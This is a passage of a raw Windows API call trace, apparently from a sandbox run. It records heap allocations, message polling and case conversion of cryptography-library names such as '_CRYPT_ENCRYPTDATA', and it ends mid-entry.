[0089.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0089.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2340 [0089.856] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3a40) returned 0x4519a58 [0089.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0089.856] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.856] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3a40) returned 0x4516010 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4516010 | out: hHeap=0x1780000) returned 1 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca220 | out: hHeap=0x1780000) returned 1 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.857] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2510 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.857] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e24f0 | out: hHeap=0x1780000) returned 1 [0089.857] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0089.857] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e24f0 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2510 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391f50 [0089.858] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0089.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391f50 | out: hHeap=0x1780000) returned 1 [0089.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2510 | out: hHeap=0x1780000) returned 1 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2510 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3a0 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2520 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2330 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3a40) returned 0x4516010 [0089.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2520 | out: hHeap=0x1780000) returned 1 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2520 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca340 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2350 [0089.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2350 | out: hHeap=0x1780000) returned 1 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2350 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3b8 [0089.858] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2380 [0089.858] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2380 | out: hHeap=0x1780000) returned 1 [0089.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2380 [0089.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca238 [0089.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0089.859] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca2e0 [0089.859] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca358 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26c0 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca280 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x3a40) returned 0x451d4a0 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0089.860] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1a8 | out: hHeap=0x1780000) returned 1 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca268 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca400 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca220 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0089.860] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca298 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2550 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca2f8 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a90f8 [0089.861] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0089.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0089.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0089.861] PeekMessageW (in: lpMsg=0x144edac, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144edac) returned 0 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3d0 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2620 [0089.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca3d0 | out: hHeap=0x1780000) returned 1 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca310 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0089.861] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0089.861] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0089.862] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0089.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0089.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf860 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca460 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0089.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca3d0 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25e0 [0089.862] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca3e8 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8de0 [0089.862] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.862] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe28 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca430 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2700 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca250 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0089.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfe78 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.863] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796e88 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25f0 [0089.863] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.864] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1a8 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0089.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca208 | out: hHeap=0x1780000) returned 1 [0089.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1d8 | out: hHeap=0x1780000) returned 1 [0089.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0089.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2690 | out: hHeap=0x1780000) returned 1 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0089.864] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2690 [0089.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.864] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca478 | out: hHeap=0x1780000) returned 1 [0089.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca448 | out: hHeap=0x1780000) returned 1 [0089.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe78 | out: hHeap=0x1780000) returned 1 [0089.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0089.865] PeekMessageW (in: lpMsg=0x144e894, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e894) returned 0 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca448 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca478 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0089.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca190 | out: hHeap=0x1780000) returned 1 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfec8 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca190 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391b28 [0089.865] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0089.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391b28 | out: hHeap=0x1780000) returned 1 [0089.865] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.865] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca1c0 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0089.866] PeekMessageW (in: lpMsg=0x144e244, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e244) returned 0 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2570 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0089.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a9188 | out: hHeap=0x1780000) returned 1 [0089.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca1c0 | out: hHeap=0x1780000) returned 1 [0089.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1c0 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca1d8 [0089.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca208 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0089.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25a0 | out: hHeap=0x1780000) returned 1 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca598 [0089.866] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.866] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0089.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26e0 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0089.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0089.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca640 [0089.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0089.867] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fc8 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2848 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0089.867] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0089.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca610 [0089.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26f0 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0030 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25f0 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1796fe8 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2ae8 [0089.868] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0089.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25f0 | out: hHeap=0x1780000) returned 1 [0089.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0089.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2ae8 | out: hHeap=0x1780000) returned 1 [0089.868] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fe8 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca508 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0030 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26f0 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0089.869] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2580 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2570 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca580 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2600 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2530 | out: hHeap=0x1780000) returned 1 [0089.869] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, 